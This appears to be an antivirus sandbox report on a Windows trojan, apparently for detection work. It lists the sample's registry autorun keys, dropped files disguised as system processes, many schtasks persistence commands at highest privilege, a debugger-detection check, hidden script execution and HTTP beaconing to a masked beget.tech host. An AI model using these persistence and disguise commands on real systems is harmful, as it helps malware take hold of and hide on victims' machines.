Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"C:\fontdriverDllsvc\iexplore.exe"'
- [<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "C:\fontdriverDllsvc\iexplore.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'Idle' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\Idle.exe"'
- [<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "C:\fontdriverDllsvc\iexplore.exe", "C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\Idle.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'taskhost' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe"'
- [<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "C:\fontdriverDllsvc\iexplore.exe", "C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\Idle.exe", "C:\Reco...
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'smss' = '"%ProgramFiles%\WinRAR\smss.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'dwm' = '"C:\Documents and Settings\dwm.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'winlogon' = '"%ProgramFiles(x86)%\Opera\Assets\winlogon.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"C:\Documents and Settings\iexplore.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'smss' = '"C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\smss.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"%WINDIR%\AppCompat\Programs\firefox.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'WUDFHost' = '"%ALLUSERSPROFILE%\Microsoft Help\WUDFHost.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'conhost' = '"<Current directory>\conhost.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'lsass' = '"%WINDIR%\AppPatch\Custom\lsass.exe"'
Creates or modifies the following files
- <SYSTEM32>\tasks\kguziexplore
- <SYSTEM32>\tasks\dwuyfirefox
- <SYSTEM32>\tasks\winlogon
- <SYSTEM32>\tasks\wudfhost
- <SYSTEM32>\tasks\nofsiexplore
- <SYSTEM32>\tasks\moaziexplore
- <SYSTEM32>\tasks\v14xsmss
- <SYSTEM32>\tasks\9ioxsmss
- <SYSTEM32>\tasks\firefox
- <SYSTEM32>\tasks\taskhost
- <SYSTEM32>\tasks\zfwwsmss
- <SYSTEM32>\tasks\fagowudfhost
- <SYSTEM32>\tasks\ghs4conhost
- <SYSTEM32>\tasks\xy75firefox
- <SYSTEM32>\tasks\thnbconhost
- <SYSTEM32>\tasks\lsjywudfhost
- <SYSTEM32>\tasks\zgpaconhost
- <SYSTEM32>\tasks\zo9clsass
- <SYSTEM32>\tasks\lsass
- <SYSTEM32>\tasks\cujjwudfhost
- <SYSTEM32>\tasks\conhost
- <SYSTEM32>\tasks\nozesmss
- <SYSTEM32>\tasks\7anmiexplore
- <SYSTEM32>\tasks\smss
- <SYSTEM32>\tasks\rd2oiexplore
- <SYSTEM32>\tasks\frghidle
- <SYSTEM32>\tasks\klwsidle
- <SYSTEM32>\tasks\oj4kiexplore
- <SYSTEM32>\tasks\0vgridle
- <SYSTEM32>\tasks\k7xvtaskhost
- <SYSTEM32>\tasks\idle
- <SYSTEM32>\tasks\ltgusmss
- <SYSTEM32>\tasks\6cxjlsass
- <SYSTEM32>\tasks\85htfirefox
- <SYSTEM32>\tasks\xzyrtaskhost
- <SYSTEM32>\tasks\5wc7smss
- <SYSTEM32>\tasks\szpcwinlogon
- <SYSTEM32>\tasks\dwm
- <SYSTEM32>\tasks\4qaswinlogon
- <SYSTEM32>\tasks\ty2xdwm
- <SYSTEM32>\tasks\j213winlogon
- <SYSTEM32>\tasks\cdv9dwm
- <SYSTEM32>\tasks\hhkddwm
- <SYSTEM32>\tasks\iexplore
- <SYSTEM32>\tasks\dqwgtaskhost
- <SYSTEM32>\tasks\7v7rlsass
Malicious functions
Searches for windows to
detect analytical utilities:
- ClassName: 'OLLYDBG', WindowName: ''
Modifies file system
Creates the following files
- C:\fontdriverdllsvc\file.vbs
- %TEMP%\2zv2ezo0qu
- %WINDIR%\apppatch\custom\6203df4a6bafc7
- %WINDIR%\apppatch\custom\lsass.exe
- <Current directory>\088424020bedd6
- <Current directory>\conhost.exe
- %ALLUSERSPROFILE%\microsoft help\480b7989c529f6
- %ALLUSERSPROFILE%\microsoft help\wudfhost.exe
- %WINDIR%\appcompat\programs\0fc223bdacedc3
- %WINDIR%\appcompat\programs\firefox.exe
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\69ddcba757bf72
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\smss.exe
- C:\documents and settings\9db6e019d4f04e
- C:\documents and settings\iexplore.exe
- %TEMP%\avnkukyti8.bat
- %ProgramFiles(x86)%\opera\assets\cc11b995f2a76d
- C:\documents and settings\6cb0b6c459d5d3
- C:\documents and settings\dwm.exe
- %ProgramFiles%\winrar\69ddcba757bf72
- %ProgramFiles%\winrar\smss.exe
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\b75386f1303e64
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\6ccacd8608530f
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\idle.exe
- C:\fontdriverdllsvc\9db6e019d4f04e
- C:\fontdriverdllsvc\iexplore.exe
- C:\fontdriverdllsvc\n3vbkalzklgndmr.vbe
- C:\fontdriverdllsvc\fontdriverdllsvcfontruntimecommon.exe
- C:\fontdriverdllsvc\vfgjqiy.bat
- %ProgramFiles(x86)%\opera\assets\winlogon.exe
- nul
Deletes the following files
- %TEMP%\2zv2ezo0qu
Network activity
Connects to
- 'ga####rj.beget.tech':80
TCP
HTTP GET requests
- http://ga####rj.beget.tech/externalToCpumultiBase.php?ti#########################################################################################################################################...
- http://ga####rj.beget.tech/externalToCpumultiBase.php?6b#########################################################################################################################################...
UDP
- DNS ASK ga####rj.beget.tech
- 'localhost':123
Miscellaneous
Searches for the following windows
- ClassName: 'EDIT' WindowName: ''
Creates and executes the following
- '%WINDIR%\syswow64\wscript.exe' "C:\fontdriverDllsvc\n3VBkALZklGNDMR.vbe"
- '%WINDIR%\syswow64\wscript.exe' "C:\fontdriverDllsvc\file.vbs"
- 'C:\fontdriverdllsvc\fontdriverdllsvcfontruntimecommon.exe'
- '%ProgramFiles(x86)%\opera\assets\winlogon.exe'
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\fontdriverDllsvc\VFgJQiY.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\avnkuKYtI8.bat"' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\fontdriverDllsvc\VFgJQiY.bat" "
- '<SYSTEM32>\schtasks.exe' /create /tn "moaZiexplore" /sc ONSTART /tr "'C:\Documents and Settings\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "iexplore" /sc MINUTE /mo 11 /tr "'C:\Documents and Settings\iexplore.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "9ioXsmss" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "v14Xsmss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "ZFwWsmss" /sc ONSTART /tr "'C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "smss" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\smss.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "85hTfirefox" /sc MINUTE /mo 12 /tr "'%WINDIR%\AppCompat\Programs\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "XY75firefox" /sc ONLOGON /tr "'%WINDIR%\AppCompat\Programs\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "DWuyfirefox" /sc ONSTART /tr "'%WINDIR%\AppCompat\Programs\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefox" /sc MINUTE /mo 8 /tr "'%WINDIR%\AppCompat\Programs\firefox.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lSjYWUDFHost" /sc ONLOGON /tr "'%ALLUSERSPROFILE%\Microsoft Help\WUDFHost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\avnkuKYtI8.bat"
- '<SYSTEM32>\schtasks.exe' /create /tn "faGoWUDFHost" /sc ONSTART /tr "'%ALLUSERSPROFILE%\Microsoft Help\WUDFHost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "WUDFHost" /sc MINUTE /mo 11 /tr "'%ALLUSERSPROFILE%\Microsoft Help\WUDFHost.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "Zgpaconhost" /sc MINUTE /mo 9 /tr "'<Current directory>\conhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "tHnBconhost" /sc ONLOGON /tr "'<Current directory>\conhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "ghS4conhost" /sc ONSTART /tr "'<Current directory>\conhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "conhost" /sc MINUTE /mo 12 /tr "'<Current directory>\conhost.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "ZO9clsass" /sc MINUTE /mo 6 /tr "'%WINDIR%\AppPatch\Custom\lsass.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "6Cxjlsass" /sc ONLOGON /tr "'%WINDIR%\AppPatch\Custom\lsass.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "7V7Rlsass" /sc ONSTART /tr "'%WINDIR%\AppPatch\Custom\lsass.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsass" /sc MINUTE /mo 8 /tr "'%WINDIR%\AppPatch\Custom\lsass.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "7aNmiexplore" /sc ONLOGON /tr "'C:\Documents and Settings\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "cUjJWUDFHost" /sc MINUTE /mo 13 /tr "'%ALLUSERSPROFILE%\Microsoft Help\WUDFHost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "Nofsiexplore" /sc MINUTE /mo 9 /tr "'C:\Documents and Settings\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "DQWGtaskhost" /sc ONSTART /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "kguziexplore" /sc MINUTE /mo 8 /tr "'C:\fontdriverDllsvc\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "rd2Oiexplore" /sc ONLOGON /tr "'C:\fontdriverDllsvc\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "OJ4Kiexplore" /sc ONSTART /tr "'C:\fontdriverDllsvc\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "iexplore" /sc MINUTE /mo 13 /tr "'C:\fontdriverDllsvc\iexplore.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "FrghIdle" /sc MINUTE /mo 7 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\Idle.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "0VgrIdle" /sc ONLOGON /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\Idle.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "klWsIdle" /sc ONSTART /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\Idle.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "Idle" /sc MINUTE /mo 12 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\Idle.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "XZYrtaskhost" /sc MINUTE /mo 11 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "K7Xvtaskhost" /sc ONLOGON /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "taskhost" /sc MINUTE /mo 14 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "SzPCwinlogon" /sc ONSTART /tr "'%ProgramFiles(x86)%\Opera\Assets\winlogon.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "5Wc7smss" /sc MINUTE /mo 10 /tr "'%ProgramFiles%\WinRAR\smss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "Ltgusmss" /sc ONLOGON /tr "'%ProgramFiles%\WinRAR\smss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "nozEsmss" /sc ONSTART /tr "'%ProgramFiles%\WinRAR\smss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "smss" /sc MINUTE /mo 7 /tr "'%ProgramFiles%\WinRAR\smss.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "TY2Xdwm" /sc MINUTE /mo 6 /tr "'C:\Documents and Settings\dwm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "hhKDdwm" /sc ONLOGON /tr "'C:\Documents and Settings\dwm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "cDv9dwm" /sc ONSTART /tr "'C:\Documents and Settings\dwm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "dwm" /sc MINUTE /mo 5 /tr "'C:\Documents and Settings\dwm.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "j213winlogon" /sc MINUTE /mo 11 /tr "'%ProgramFiles(x86)%\Opera\Assets\winlogon.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "4QaSwinlogon" /sc ONLOGON /tr "'%ProgramFiles(x86)%\Opera\Assets\winlogon.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "winlogon" /sc MINUTE /mo 12 /tr "'%ProgramFiles(x86)%\Opera\Assets\winlogon.exe'" /f
- '<SYSTEM32>\w32tm.exe' /stripchart /computer:localhost /period:5 /dataonly /samples:2
